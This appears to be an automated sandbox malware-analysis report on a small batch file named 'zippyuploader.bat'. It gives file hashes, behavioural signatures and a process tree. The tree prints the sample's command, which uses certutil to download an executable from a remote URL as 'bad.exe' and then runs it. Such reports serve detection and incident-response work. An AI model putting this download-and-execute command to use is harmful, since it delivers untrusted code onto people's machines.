Analysis
-
max time kernel
650s -
max time network
1558s -
platform
windows7_x64 -
resource
win7-20220310-en -
submitted
21-03-2022 16:55
Static task
static1
Behavioral task
behavioral1
Sample
zippyuploader.bat
Resource
win7-20220310-en
Behavioral task
behavioral2
Sample
zippyuploader.bat
Resource
win10-20220223-en
Behavioral task
behavioral3
Sample
zippyuploader.bat
Resource
win10v2004-20220310-en
General
-
Target
zippyuploader.bat
-
Size
107B
-
MD5
0fac231074f90878c2283b2561ed906c
-
SHA1
2c3421f0a6c20b8c6fb07ffe62526438a5169194
-
SHA256
acfd8e0557e2efc01d981221e5e5e0fcd68f7231a72d3d46361294d9df43d984
-
SHA512
fdc5f227244f4e0a76356aba17e38823e0e9bb0ffc344ce07b6bc9282c7192c08a9cbd42d157d13be0c378c9678aec4ea1ea6c7d663d21e732a73a2ceb6159b9
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
bad.exepid process 1532 bad.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\bad.exe upx C:\Users\Admin\AppData\Local\Temp\bad.exe upx -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
bad.exepid process 1532 bad.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
bad.exepid process 1532 bad.exe 1532 bad.exe 1532 bad.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
cmd.exedescription pid process target process PID 2016 wrote to memory of 852 2016 cmd.exe certutil.exe PID 2016 wrote to memory of 852 2016 cmd.exe certutil.exe PID 2016 wrote to memory of 852 2016 cmd.exe certutil.exe PID 2016 wrote to memory of 1532 2016 cmd.exe bad.exe PID 2016 wrote to memory of 1532 2016 cmd.exe bad.exe PID 2016 wrote to memory of 1532 2016 cmd.exe bad.exe PID 2016 wrote to memory of 1532 2016 cmd.exe bad.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\zippyuploader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\certutil.execertutil.exe -urlcache -f https://www.zippyshare.com/zippyuploader/ZippyUploader.exe bad.exe2⤵PID:852
-
C:\Users\Admin\AppData\Local\Temp\bad.exebad.exe2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1532
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ed323324bff4fbe54be6040ef429862c
SHA12182d6953bc33050d44ca585ca3e6e64cd0a6864
SHA25688184dea2107e5fc67d1901391963b4b7a94381407c9fbb20936269acff6c442
SHA51272511481199722a7d31ff3a50ac0a9f9126f8d124c22f1bb0457a43466ee2263c1bd5012209ee2f426dfcc17645842098e2594321eae3562dde86b25ade6831b
-
MD5
ed323324bff4fbe54be6040ef429862c
SHA12182d6953bc33050d44ca585ca3e6e64cd0a6864
SHA25688184dea2107e5fc67d1901391963b4b7a94381407c9fbb20936269acff6c442
SHA51272511481199722a7d31ff3a50ac0a9f9126f8d124c22f1bb0457a43466ee2263c1bd5012209ee2f426dfcc17645842098e2594321eae3562dde86b25ade6831b